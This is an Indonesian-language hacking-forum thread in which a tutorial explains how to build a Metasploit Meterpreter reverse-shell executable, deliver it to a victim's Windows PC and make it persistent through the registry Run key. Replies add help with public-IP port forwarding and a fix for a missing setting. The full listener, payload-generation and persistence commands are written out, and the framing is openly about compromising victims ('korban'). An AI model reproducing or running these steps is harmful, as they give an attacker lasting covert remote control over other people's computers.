Membuat payload meterpreter permanent

**xbuster404** · 05-15-2013, 10:09 AM

[Image: images?q=tbn:ANd9GcRATzK0Bd0wveLWIueFujS...YHKtTAN5Sg]

langsung saja ya..

buka metasploit kalian disini saya menggunkan backtrack 5 r3

buka terminal ketikkan msfconsole untuk membuka metasploit

[Image: Selection_001.png]

lalu masukkan exploit sebagai berikut

use exploit/multi/handler
set lport 4444
set lhost 192.168.1.73 ( isi dengan ip kalian )
exploit

[Image: Selection_005.png]

setelah itu kita bikin listener dengan meterpreter

buka terminal baru ketikkan perintah

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.73 x > Desktop/4444.exe

disini nama payload saya adalah 4444.exe

[Image: Selection_002.png]

setelah itu kirim payload tersebut ke pc korban atau dengan teknik lain

[Image: Capture.PNG]

setelah korban mengeksekusi file payload tersebut
maka session meterpreter akan terbuka

[Image: Selection_006.png]

setelah itu ketikkan perintah background pada meterpreter untuk memulai aksi mempermnentkan meterpreter

dan kita akan mencari exploit permanentnya dengan mengetik perintah
search persistence

[Image: Selection_007.png]

dan lanjutkan untuk perintah selanjutnya

use post/windows/manage/persistence
set lhost 192.168.1.73
set lport 4444
set rexe /root/Desktop/4444.exe
set rexename xbuster404.exe
set session 1
exploit

dan sukses meterpreter sudah tertanam pada pc korban

[Image: Selection_008.png]

sekarang kita coba test untuk membuktkanya
dengan me-reboot pc korban

[Image: Selection_009.png]

dan pc korban kembali hidup
maka meterpreter session akan terbuka lagi Smile

payload tersebut berada pada regedit HKCU > Software > Microsoft > Windows > CurrentVersion > RUN

[Image: Capture.PNG]

selamat berexploitasi

**Clound_Carbelius** · 05-15-2013, 11:46 AM

Nice banget om...
rajin-rajin update begini'an dah.. gw demen banget :-bd :-bd

**yhojoon** · 05-15-2013, 08:06 PM

kalo pake IP publick gmn yah?

**xbuster404** · 05-15-2013, 08:42 PM

(05-15-2013, 08:06 PM)yhojoon Wrote: kalo pake IP publick gmn yah?

setting dulu ip forarnya bro

\m/

**Veronochi** · 05-16-2013, 12:01 PM

nice share coy...

cocok..

**hamdan_zenith** · 05-17-2013, 01:47 PM

nice broo

oia itukan lhost=192.168.1.73, misalx ip kita terganti, apa kita harus membuat payload baru lagi lalu infeksi ulang komputer korban ?

**hexadecimal** · 05-20-2013, 10:06 AM

keren om..izin belajar Smile

**child** · 05-21-2013, 12:46 AM

bro kok ga bisa ya kalo dibuat permanen, tapi kalo di sessions -i 1 bisa masuk meterpreter, di reboot juga bisa,,apa gara2 rename nya ga sesuai tutor Angry

kaya gini tampilannya

**xbuster404** · 05-21-2013, 06:08 PM

(05-21-2013, 12:46 AM)child Wrote: bro kok ga bisa ya kalo dibuat permanen, tapi kalo di sessions -i 1 bisa masuk meterpreter, di reboot juga bisa,,apa gara2 rename nya ga sesuai tutor
kaya gini tampilannya

sory bro rules

lagi sibuk

itu perintahnya kurang bro set payload nya

seperti

set rexe /root/Desktop/4444.exe

Smile

:-

**child** · 05-21-2013, 09:41 PM

(05-21-2013, 06:08 PM)xbuster404 Wrote:
(05-21-2013, 12:46 AM)child Wrote: bro kok ga bisa ya kalo dibuat permanen, tapi kalo di sessions -i 1 bisa masuk meterpreter, di reboot juga bisa,,apa gara2 rename nya ga sesuai tutor
kaya gini tampilannya

sory bro rules

lagi sibuk

itu perintahnya kurang bro set payload nya

seperti

set rexe /root/Desktop/4444.exe

:-

ow iya bro, sory2 ada yg kelewatan :d
biar tak coba lg